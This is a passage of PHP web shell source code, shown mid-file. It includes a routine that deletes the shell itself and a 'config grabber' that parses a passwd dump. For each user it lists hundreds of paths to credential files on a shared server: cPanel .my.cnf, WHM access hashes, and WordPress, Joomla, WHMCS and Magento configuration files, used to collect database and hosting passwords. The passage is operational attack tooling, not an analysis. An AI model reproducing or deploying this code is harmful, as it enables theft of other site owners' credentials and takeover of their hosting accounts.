  2248. echo '<br><center>U REALLY WANT TO REMOVE SHELL?&nbsp;&nbsp;<b><a href="?dir=$dir&do=self1"><font style="color:#ff0000;" >YES</font></a></center><br>';
  2249. }
  2250. elseif($_GET['do'] == 'self1') {
  2251. $file = $_SERVER['PHP_SELF'];
  2252. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  2253. header('<meta refresh="0">; '.$_SERVER['PHP_SELF'].'');
  2254. }
  2255. elseif($_GET['do'] == 'config') {
  2256.     if($_POST){
  2257.         $passwd = $_POST['passwd'];
  2258.         mkdir("bct_config1", 0777);
  2259.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2260.         $htc = fopen("bct_config1/.htaccess","w");
  2261.         fwrite($htc, $isi_htc);
  2262.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2263.         foreach($user_config[1] as $usere_cok) {
  2264.             $user_config_dir = "/home/$usere_cok/public_html/";
  2265.             if(is_readable($user_config_dir)) {
  2266.                 $grab_config = array(
  2267.                                         "/home/$usere_cok/.my.cnf" => "cpanel",
  2268.                     "/home/$usere_cok/.accesshash" => "WHM-accesshash",
  2269.                     "/home/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
  2270.                     "/home/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
  2271.                     "/home/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2272.                     "/home/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",            
  2273.                     "/home/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
  2274.                     "/home/$usere_cok/public_html/forum/config.php" => "phpBB",
  2275.                     "/home/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
  2276.                     "/home/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
  2277.                     "/home/$usere_cok/public_html/app/etc/local.xml" => "Magento",
  2278.                     "/home/$usere_cok/public_html/admin/config.php" => "OpenCart",
  2279.                     "/home/$usere_cok/public_html/slconfig.php" => "Sitelok",
  2280.                     "/home/$usere_cok/public_html/application/config/database.php" => "Ellislab",                  
  2281.                     "/home/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
  2282.                     "/home/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2283.                     "/home/$usere_cok/public_html/central/configuration.php" => "WHM Central",
  2284.                     "/home/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2285.                     "/home/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2286.                     "/home/$usere_cok/public_html/submitticket.php" => "WHMCS",                                    
  2287.                     "/home/$usere_cok/public_html/configuration.php" => "Joomla",                  
  2288.                     "/home/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2289.                     "/home/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2290.                     "/home/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2291.                     "/home/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
  2292.                     "/home/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
  2293.                     "/home/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
  2294.                     "/home/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
  2295.                     "/home/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
  2296.                     "/home/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
  2297.                     "/home/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
  2298.                     "/home/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
  2299.                     "/home/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
  2300.                     "/home/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
  2301.                     "/home/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
  2302.                     "/home/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
  2303.                     "/home/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
  2304.                     "/home/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
  2305.                     "/home/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
  2306.                     "/home/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
  2307.                     "/home/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2308.                     "/home/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
  2309.                     "/home/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2310.                     "/home/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2311.                     "/home/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2312.                     "/home/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
  2313.                     "/home/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
  2314.                     "/home/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
  2315.                     "/home/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
  2316.                     "/home/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
  2317.                     "/home/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
  2318.                     "/home/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
  2319.                     "/home/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
  2320.                     "/home/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
  2321.                     "/home/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
  2322.                     "/home/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2323.                     "/home/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2324.                     "/home/$usere_cok/public_html/wp-config.php" => "WordPress",
  2325.                     "/home/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2326.                     "/home/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2327.                     "/home/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2328.                     "/home/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
  2329.                     "/home/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
  2330.                     "/home/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
  2331.                     "/home/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
  2332.                     "/home/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
  2333.                     "/home/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
  2334.                     "/home/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
  2335.                     "/home/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
  2336.                     "/home/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
  2337.                     "/home/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
  2338.                     "/home/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
  2339.                     "/home/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
  2340.                     "/home/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
  2341.                     "/home/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
  2342.                     "/home/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
  2343.                     "/home/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
  2344.                     "/home/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2345.                     "/home/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
  2346.                     "/home/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2347.                     "/home/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2348.                     "/home/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2349.                     "/home/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
  2350.                     "/home/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
  2351.                     "/home/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
  2352.                     "/home/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
  2353.                     "/home/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
  2354.                     "/home/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
  2355.                     "/home/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
  2356.                     "/home/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
  2357.                     "/home/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
  2358.                     "/home/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
  2359.                     "/home/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2360.                     "/home/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
  2361.                     "/home1/$usere_cok/.my.cnf" => "cpanel",
  2362.                     "/home1/$usere_cok/.accesshash" => "WHM-accesshash",
  2363.                     "/home1/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
  2364.                     "/home1/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
  2365.                     "/home1/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2366.                     "/home1/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
  2367.                     "/home1/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
  2368.                     "/home1/$usere_cok/public_html/forum/config.php" => "phpBB",
  2369.                     "/home1/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
  2370.                     "/home1/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
  2371.                     "/home1/$usere_cok/public_html/app/etc/local.xml" => "Magento",
  2372.                     "/home1/$usere_cok/public_html/admin/config.php" => "OpenCart",
  2373.                     "/home1/$usere_cok/public_html/slconfig.php" => "Sitelok",
  2374.                     "/home1/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
  2375.                     "/home1/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
  2376.                     "/home1/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2377.                     "/home1/$usere_cok/public_html/central/configuration.php" => "WHM Central",
  2378.                     "/home1/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2379.                     "/home1/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2380.                     "/home1/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
  2381.                     "/home1/$usere_cok/public_html/configuration.php" => "Joomla",                 
  2382.                     "/home1/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2383.                     "/home1/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2384.                     "/home1/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2385.                     "/home1/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
  2386.                     "/home1/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
  2387.                     "/home1/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
  2388.                     "/home1/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
  2389.                     "/home1/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
  2390.                     "/home1/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
  2391.                     "/home1/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
  2392.                     "/home1/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
  2393.                     "/home1/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
  2394.                     "/home1/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
  2395.                     "/home1/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
  2396.                     "/home1/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
  2397.                     "/home1/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
  2398.                     "/home1/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
  2399.                     "/home1/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
  2400.                     "/home1/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
  2401.                     "/home1/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2402.                     "/home1/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
  2403.                     "/home1/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2404.                     "/home1/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2405.                     "/home1/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2406.                     "/home1/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
  2407.                     "/home1/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
  2408.                     "/home1/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
  2409.                     "/home1/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
  2410.                     "/home1/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
  2411.                     "/home1/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
  2412.                     "/home1/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
  2413.                     "/home1/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
  2414.                     "/home1/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
  2415.                     "/home1/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
  2416.                     "/home1/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2417.                     "/home1/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2418.                     "/home1/$usere_cok/public_html/wp-config.php" => "WordPress",
  2419.                     "/home1/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2420.                     "/home1/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2421.                     "/home1/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
  2422.                     "/home1/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
  2423.                     "/home1/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
  2424.                     "/home1/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
  2425.                     "/home1/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
  2426.                     "/home1/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
  2427.                     "/home1/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
  2428.                     "/home1/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
  2429.                     "/home1/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
  2430.                     "/home1/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
  2431.                     "/home1/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
  2432.                     "/home1/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
  2433.                     "/home1/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
  2434.                     "/home1/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
  2435.                     "/home1/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
  2436.                     "/home1/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
  2437.                     "/home1/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
  2438.                     "/home1/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2439.                     "/home1/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
  2440.                     "/home1/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2441.                     "/home1/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2442.                     "/home1/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2443.                     "/home1/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
  2444.                     "/home1/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
  2445.                     "/home1/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
  2446.                     "/home1/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
  2447.                     "/home1/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
  2448.                     "/home1/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
  2449.                     "/home1/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
  2450.                     "/home1/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
  2451.                     "/home1/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
  2452.                     "/home1/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
  2453.                     "/home1/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2454.                     "/home1/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
  2455.                     "/home2/$usere_cok/.my.cnf" => "cpanel",
  2456.                     "/home2/$usere_cok/.accesshash" => "WHM-accesshash",
  2457.                     "/home2/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
  2458.                     "/home2/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
  2459.                     "/home2/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2460.                     "/home2/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
  2461.                     "/home2/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
  2462.                     "/home2/$usere_cok/public_html/forum/config.php" => "phpBB",
  2463.                     "/home2/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
  2464.                     "/home2/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
  2465.                     "/home2/$usere_cok/public_html/app/etc/local.xml" => "Magento",
  2466.                     "/home2/$usere_cok/public_html/admin/config.php" => "OpenCart",
  2467.                     "/home2/$usere_cok/public_html/slconfig.php" => "Sitelok",
  2468.                     "/home2/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
  2469.                     "/home2/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
  2470.                     "/home2/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2471.                     "/home2/$usere_cok/public_html/central/configuration.php" => "WHM Central",
  2472.                     "/home2/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2473.                     "/home2/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2474.                     "/home2/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
  2475.                     "/home2/$usere_cok/public_html/configuration.php" => "Joomla",                 
  2476.                     "/home2/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2477.                     "/home2/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2478.                     "/home2/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2479.                     "/home2/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
  2480.                     "/home2/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
  2481.                     "/home2/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
  2482.                     "/home2/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
  2483.                     "/home2/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
  2484.                     "/home2/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
  2485.                     "/home2/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
  2486.                     "/home2/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
  2487.                     "/home2/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
  2488.                     "/home2/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
  2489.                     "/home2/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
  2490.                     "/home2/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
  2491.                     "/home2/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
  2492.                     "/home2/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
  2493.                     "/home2/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
  2494.                     "/home2/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
  2495.                     "/home2/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2496.                     "/home2/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
  2497.                     "/home2/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2498.                     "/home2/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2499.                     "/home2/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2500.                     "/home2/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
  2501.                     "/home2/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
  2502.                     "/home2/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
  2503.                     "/home2/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
  2504.                     "/home2/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
  2505.                     "/home2/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
  2506.                     "/home2/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
  2507.                     "/home2/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
  2508.                     "/home2/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
  2509.                     "/home2/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
  2510.                     "/home2/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2511.                     "/home2/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2512.                     "/home2/$usere_cok/public_html/wp-config.php" => "WordPress",
  2513.                     "/home2/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2514.                     "/home2/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2515.                     "/home2/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
  2516.                     "/home2/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
  2517.                     "/home2/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
  2518.                     "/home2/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
  2519.                     "/home2/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
  2520.                     "/home2/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
  2521.                     "/home2/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
  2522.                     "/home2/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
  2523.                     "/home2/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
  2524.                     "/home2/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
  2525.                     "/home2/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
  2526.                     "/home2/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
  2527.                     "/home2/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
  2528.                     "/home2/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
  2529.                     "/home2/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
  2530.                     "/home2/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
  2531.                     "/home2/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
  2532.                     "/home2/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2533.                     "/home2/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
  2534.                     "/home2/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2535.                     "/home2/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2536.                     "/home2/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2537.                     "/home2/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
  2538.                     "/home2/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
  2539.                     "/home2/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
  2540.                     "/home2/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
  2541.                     "/home2/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
  2542.                     "/home2/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
  2543.                     "/home2/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
  2544.                     "/home2/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
  2545.                     "/home2/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
  2546.                     "/home2/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
  2547.                     "/home2/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2548.                     "/home2/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal",
  2549.                     "/home3/$usere_cok/.my.cnf" => "cpanel",
  2550.                     "/home3/$usere_cok/.accesshash" => "WHM-accesshash",
  2551.                     "/home3/$usere_cok/public_html/bw-configs/config.ini" => "BosWeb",
  2552.                     "/home3/$usere_cok/public_html/config/koneksi.php" => "Lokomedia",
  2553.                     "/home3/$usere_cok/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2554.                     "/home3/$usere_cok/public_html/clientarea/configuration.php" => "WHMCS",               
  2555.                     "/home3/$usere_cok/public_html/whmcs/configuration.php" => "WHMCS",
  2556.                     "/home3/$usere_cok/public_html/forum/config.php" => "phpBB",
  2557.                     "/home3/$usere_cok/public_html/sites/default/settings.php" => "Drupal",
  2558.                     "/home3/$usere_cok/public_html/config/settings.inc.php" => "PrestaShop",
  2559.                     "/home3/$usere_cok/public_html/app/etc/local.xml" => "Magento",
  2560.                     "/home3/$usere_cok/public_html/admin/config.php" => "OpenCart",
  2561.                     "/home3/$usere_cok/public_html/slconfig.php" => "Sitelok",
  2562.                     "/home3/$usere_cok/public_html/application/config/database.php" => "Ellislab",                 
  2563.                     "/home3/$usere_cok/public_html/whm/configuration.php" => "WHMCS",
  2564.                     "/home3/$usere_cok/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2565.                     "/home3/$usere_cok/public_html/central/configuration.php" => "WHM Central",
  2566.                     "/home3/$usere_cok/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2567.                     "/home3/$usere_cok/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2568.                     "/home3/$usere_cok/public_html/submitticket.php" => "WHMCS",                                       
  2569.                     "/home3/$usere_cok/public_html/configuration.php" => "Joomla",                 
  2570.                     "/home3/$usere_cok/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2571.                     "/home3/$usere_cok/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2572.                     "/home3/$usere_cok/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2573.                     "/home3/$usere_cok/public_html/Home/configuration.php" => "JoomlaHome",
  2574.                     "/home3/$usere_cok/public_html/HOME/configuration.php" => "JoomlaHome",
  2575.                     "/home3/$usere_cok/public_html/home/configuration.php" => "JoomlaHome",
  2576.                     "/home3/$usere_cok/public_html/NEW/configuration.php" => "JoomlaNew",
  2577.                     "/home3/$usere_cok/public_html/New/configuration.php" => "JoomlaNew",
  2578.                     "/home3/$usere_cok/public_html/new/configuration.php" => "JoomlaNew",
  2579.                     "/home3/$usere_cok/public_html/News/configuration.php" => "JoomlaNews",
  2580.                     "/home3/$usere_cok/public_html/NEWS/configuration.php" => "JoomlaNews",
  2581.                     "/home3/$usere_cok/public_html/news/configuration.php" => "JoomlaNews",
  2582.                     "/home3/$usere_cok/public_html/Cms/configuration.php" => "JoomlaCms",
  2583.                     "/home3/$usere_cok/public_html/CMS/configuration.php" => "JoomlaCms",
  2584.                     "/home3/$usere_cok/public_html/cms/configuration.php" => "JoomlaCms",
  2585.                     "/home3/$usere_cok/public_html/Main/configuration.php" => "JoomlaMain",
  2586.                     "/home3/$usere_cok/public_html/MAIN/configuration.php" => "JoomlaMain",
  2587.                     "/home3/$usere_cok/public_html/main/configuration.php" => "JoomlaMain",
  2588.                     "/home3/$usere_cok/public_html/Blog/configuration.php" => "JoomlaBlog",
  2589.                     "/home3/$usere_cok/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2590.                     "/home3/$usere_cok/public_html/blog/configuration.php" => "JoomlaBlog",
  2591.                     "/home3/$usere_cok/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2592.                     "/home3/$usere_cok/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2593.                     "/home3/$usere_cok/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2594.                     "/home3/$usere_cok/public_html/beta/configuration.php" => "JoomlaBeta",
  2595.                     "/home3/$usere_cok/public_html/Beta/configuration.php" => "JoomlaBeta",
  2596.                     "/home3/$usere_cok/public_html/BETA/configuration.php" => "JoomlaBeta",
  2597.                     "/home3/$usere_cok/public_html/PRESS/configuration.php" => "JoomlaPress",
  2598.                     "/home3/$usere_cok/public_html/Press/configuration.php" => "JoomlaPress",
  2599.                     "/home3/$usere_cok/public_html/press/configuration.php" => "JoomlaPress",
  2600.                     "/home3/$usere_cok/public_html/Wp/configuration.php" => "JoomlaWp",
  2601.                     "/home3/$usere_cok/public_html/wp/configuration.php" => "JoomlaWp",
  2602.                     "/home3/$usere_cok/public_html/WP/configuration.php" => "JoomlaWP",
  2603.                     "/home3/$usere_cok/public_html/portal/configuration.php" => "JoomlaPortal",
  2604.                     "/home3/$usere_cok/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2605.                     "/home3/$usere_cok/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2606.                     "/home3/$usere_cok/public_html/wp-config.php" => "WordPress",
  2607.                     "/home3/$usere_cok/public_html/wordpress/wp-config.php" => "WordPressWordpress",
